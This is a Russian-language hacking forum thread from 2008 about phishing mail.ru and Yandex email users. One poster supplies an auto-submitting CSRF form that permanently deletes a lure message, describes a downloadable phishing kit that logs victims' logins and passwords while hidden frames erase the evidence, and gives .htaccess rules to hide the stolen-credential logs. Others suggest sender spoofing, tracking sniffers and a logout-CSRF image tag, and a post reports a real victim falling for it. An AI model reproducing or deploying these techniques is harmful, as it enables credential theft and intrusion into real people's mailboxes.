ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
07.06.2008, 16:19
|
|
Участник форума
Регистрация: 13.04.2008
Сообщений: 120
Провел на форуме:
547418
Репутация:
87
|
|
ИМХО, СИ легче юзать на Яндексе.
Поясню:
- Отсутствуют какие-либо предупреждения по поводу того что пароль можно украсть
- Однако присутствуют условия при реге мыла (нельзя регистрировать мыло с вставкой admin, support, yandex). Но это легко обойти... Можно зарегать мыло типа emailhelp, emailbot и тд
Вообщем мну предпочитает яндекс. 
Хотя мэйл тоже слабо защищен... |
|
|
29.07.2008, 22:37
|
|
Познающий
Регистрация: 04.01.2007
Сообщений: 53
Провел на форуме:
166097
Репутация:
39
|
|
Однако присутствуют условия при реге мыла (нельзя регистрировать мыло с вставкой admin, support, yandex). Но это легко обойти... Можно зарегать мыло типа emailhelp, emailbot и тд
а что мешает "анонимно" послать мыло от admin@yandex.ru ?
|
|
|
|
02.08.2008, 16:34
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
Тема немного старовата, но я вставлю свои 5 копеек
1)Зачем передовать всё через GET это палевно, меняем на POST и всё.
2)Зачем перенаправлять юзера на непонятное письмо http://win.mail.ru/cgi-bin/readmsg?id=121112312 если мы можем посмотреть refer и отправить его обратно на наше письмо, но ябы селал подругому...
Из рефера получаем ID письма (буду помечать его как messid), в фрейме грузим
http://win.mail.ru/cgi-bin/movemsg?remove&id=messid
это перенесёт письмо в корзину, потом вызываем
http://win.mail.ru/cgi-bin/movemsg?remove&id=messid&confirm=on
Это спросит хотимли мы удалить навсегда письмо?
Дальше вот такая форма
Код HTML:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1250" />
<title>x3k</title>
</head>
<body onload="pe4enkiiiii.submit()">
<form action="http://win.mail.ru/cgi-bin/movemsg" method="POST" name="pe4enkiiiii">
<input type="hidden" name="confirm" value="on">
<input type="hidden" name="remove" value="1">
<input type="hidden" name="id" value="[COLOR=Red]messid[/COLOR]">
</form>
</body>
</html>
Это сносит письмо насмерть 
Дальше в фрейме вызываем http://win.mail.ru/cgi-bin/logout это выход с ящика, потом перенаправляем юзера на http://win.mail.ru/cgi-bin/login
Всё, юзверь думает ошибся пассом, заходит, письма нет, ну и *** с ним
Не тестировал, токо частично, должно работать...
Протестировал, работает
=============
ОУ! Даже знаете чо делаем... После того как юзверь прищёл к нам на скрипт делаем 2 фрейма, первый 100% http://win.mail.ru/cgi-bin/msglist второй 0% где и будут происходить наши действия, этож ваще безпалевно
Последний раз редактировалось Ponchik; 02.08.2008 в 16:42..
|
|
|
|
02.08.2008, 18:12
|
|
Участник форума
Регистрация: 01.05.2008
Сообщений: 261
Провел на форуме:
1498366
Репутация:
183
|
|
молодец, уделил время, написал. ну, что - + вообщем
|
|
|
|
02.08.2008, 19:47
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
Немного доработал скрипт, качать отсюда: http://slil.ru/26028341 (пасс antichat) эту не качай, качай на 2 поста ниже, там 2 версия
В скрипте 5 файлов
index.php - скрипт, записывающий инфу в логи
frame.php - скрипт, удаляющий письмо
log.txt - подробный лог
minilog.txt - пишется мыло и пасс
readme.html - инструкция с HTML кодом который надо отсылать
В общем заливаем скрипты куда-то, читаем readme редактируем HTML код под себя (для нубов: Чтоб отправить HTML в письме через mail.ru, нмакаем "Написать письмо" там жмакаем "Расширенный формат" вставляем HTML, отправляем) тама отредактировать 1 строку надо - ссылку на сниффер
Чел открывает письмо, тама месага типо скриптое письмо, введите логин и пасс, форма очень очень поломаная, но не я её писал, вопросы к ТСу
Так вот, чел пишет логин пасс, нажимает вход, логин и пасс идёт нам на скрипт, скрипт записывает логи и пасс в лог, при этом грузятся 2 фрейма, 1 фрейм взод на mail.ru, 2 фрейм получает от скрипта номер письма и 4 раза пытается его удалить (достаточно 2 но бывают лаги) после того как скрипт провёл свои грязные дела он перекидывает пользователя на почту, в которой от письма не осталось и следа и логи и пароль остались у нас, круто, да? 
P.S> Впервые этим занимаюсь и просто от нечего делать
=========
Гы гы, чел в аське повёлся Мля, а это работает оказывается ))
Кстате в .htaccess пропишите
Код:
<files "log.txt">
order allow,deny
deny from all
</files>
<files "minilog.txt">
order allow,deny
deny from all
</files>
Ато не кайф если логи прочитают
Последний раз редактировалось Ponchik; 02.08.2008 в 22:40..
|
|
|
|
02.08.2008, 21:08
|
|
Moderator - Level 7
Регистрация: 04.02.2007
Сообщений: 554
Провел на форуме:
7518056
Репутация:
1089
|
|
понч впринципе неплохо- маленькое дополнение- можно там еще прикрутить снифер- да куки мы неполучим-Но мы точно будем знать открыл ли пользователь наше письмо или он еще в свой ящик незаходил, кстати пользовался- когда снифер от GreenBear был живой и точно знал айпишку- открывшего письмо и забила ли жертва хрен на наш суперфейк))) и стоит ли от нее ждать пассов)))
|
|
|
|
02.08.2008, 22:34
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
Сделал, http://slil.ru/26028567 пасс antichat
Это так сказать версия 2.0 но как это называется я хз Сами придумайе название
+При открытии письма мы узнаем об этом
+В инструкцию добавлен javascript, чтоб дого не копаться
+Добавлен .htaccess чтоб сами не разбирались что там и куда
=====================
Я кстати с год назад придумал и отписал тута новый способ прикола над форумчанами, там вот он и на mail.ru покатит, отсылаем письмо
<h1>Ты грязный овце*б </h1>
<img src="http://win.mail.ru/cgi-bin/logout">
Такое западло Но можно будет удалить письмо из списка 
Последний раз редактировалось Ponchik; 02.08.2008 в 22:37..
|
|
|
|
12.08.2008, 23:01
|
|
Постоянный
Регистрация: 21.02.2007
Сообщений: 568
Провел на форуме:
2954516
Репутация:
303
|
|
Пару слов скажу.
1. если картитки отключены, то не работает HTTP_REFERER, соответственно письмо не удаляется.
2. Может я чего не понял, но временно открывается новое окно http://fake.ru/index.php, а его ни как нельзя сделать размерами 0х0 ?
|
|
|
|
13.08.2008, 15:26
|
|
Участник форума
Регистрация: 13.11.2007
Сообщений: 180
Провел на форуме:
1058585
Репутация:
122
|
|
Расскажите пожалуйста, как отправить в формате HTML и с какого ящика (то есть майл рамблер). Пробывал отправлять с клиента The Bat в HTML (ставил формат письма HTML)? но приходит письмо и в нем тупо HTML тэги то етсь не обрабатываеться как код. Прошу помощи.
|
|
|
|
13.08.2008, 17:05
|
|
Участник форума
Регистрация: 29.07.2007
Сообщений: 124
Провел на форуме:
1266562
Репутация:
60
|
|
Сообщение от iron-viper
Расскажите пожалуйста, как отправить в формате HTML и с какого ящика (то есть майл рамблер). Пробывал отправлять с клиента The Bat в HTML (ставил формат письма HTML)? но приходит письмо и в нем тупо HTML тэги то етсь не обрабатываеться как код. Прошу помощи.
Дело в том что твой код отправляется как txt
Не морочь себе голову и используй скрипт(отправил в личку)
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
